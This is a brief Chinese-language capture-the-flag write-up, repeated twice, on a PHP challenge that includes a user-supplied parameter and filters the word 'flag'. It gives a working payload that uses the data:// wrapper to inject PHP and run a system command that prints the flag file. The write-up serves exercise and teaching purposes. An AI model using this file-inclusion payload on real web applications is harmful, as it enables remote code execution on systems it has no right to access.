过滤了flag,即c中不能有flag字段。
include包含变量c,因此可以利用文件包含漏洞,让变量c变成php代码,然后通过include函数执行。可以使用data协议获取flag.php文件中的内容
data://协议 通常可以用来执行PHP代码
data://text/plain,<?php system('tac f*');?>
上传payload:?c=data://text/plain,<?php system('tac f*');?>
获得flag
过滤了flag,即c中不能有flag字段。
include包含变量c,因此可以利用文件包含漏洞,让变量c变成php代码,然后通过include函数执行。可以使用data协议获取flag.php文件中的内容
data://协议 通常可以用来执行PHP代码
data://text/plain,<?php system('tac f*');?>
上传payload:?c=data://text/plain,<?php system('tac f*');?>
获得flag